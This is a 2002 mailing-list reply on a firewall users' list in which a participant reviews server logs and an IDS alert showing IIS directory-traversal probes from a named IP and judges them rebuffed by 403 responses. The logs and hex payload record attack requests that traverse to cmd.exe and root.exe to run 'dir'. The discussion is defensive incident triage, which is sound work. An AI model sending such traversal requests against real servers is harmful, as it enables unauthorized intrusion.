RE: [gb-users] Not Gnatbox but security related

17 Jan 2002 16:44:57 -0000 


Wait a minute. Now that I take a minute to look at his logs, the return code
for the GET request is 403 (forbidden), so it looks like the probes are
being rebuffed. Besides, I've seen this guy before:
Answer Section:
    167.107.161.62.IN-ADDR.ARPA, PTR, ca-ol-bordeaux-4-167.abo.wanadoo.fr
Authority Records Section:
    107.161.62.IN-ADDR.ARPA, NS, ns.wanadoo.fr
    107.161.62.IN-ADDR.ARPA, NS, ns2.wanadoo.fr
Additional Records Section:
    ns.wanadoo.fr, A, 193.252.19.10
    ns2.wanadoo.fr, A, 193.252.19.11
2 - 2686 2002-01-14 22:20:14 [arachNIDS] WEB-MISC http directory traversal 
Sensor name interface filter 
0.0.0.1 qfe2  none  
Alert
Group   none  
IP  source addr   dest addr   Ver HdrLen TOS length  ID   flags offset TTL
chksum 
62.161.107.167    x.x.163.51   4     5     0  136  60860    0      0   111
16378 
Options     none  
sourceport destport   R1 R0 URG ACK PSH RST SYN FIN 
2427          80                 X   X  
seq #          ack    offset res window urp chksum 
2742165859 1033622641    5    0   16560   0 27344 
Options     none  
Payload   length = 94

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 32 66 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   2f../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64   m32/cmd.exe?/c+d
030 : 69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48   ir r HTTP/1.0..H
040 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65   ost: www..Connne
050 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A         ction: close..

It looks like you're OK, but check the patchlevel on your box...

> -----Original Message-----
> From: Mike Burden [mailto:[EMAIL PROTECTED]]
> Sent: Thursday, January 17, 2002 10:18 AM
> To: [EMAIL PROTECTED]
> Subject: RE: [gb-users] Not Gnatbox but security related
> 
> 
> If you HAVE to stick with IIS:
> - Reformat the machine, reload the OS
> - Upgrade IIS to version 5 or later
> - Apply the latest cumulative patch and any

> > 2002-01-17 10:52:31 62.161.107.167 - 10.10.1.1 80 GET 
> > /scripts/root.exe
> > /c+dir 403 www -
> > 2002-01-17 10:52:46 62.161.107.167 - 10.10.1.1 80 GET 
> > /MSADC/root.exe /c+dir
> > 403 www -
> > 2002-01-17 10:52:54 62.161.107.167 - 10.10.1.1 80 GET
> > /c/winnt/system32/cmd.exe /c+dir 403 www -
>

Reply via email to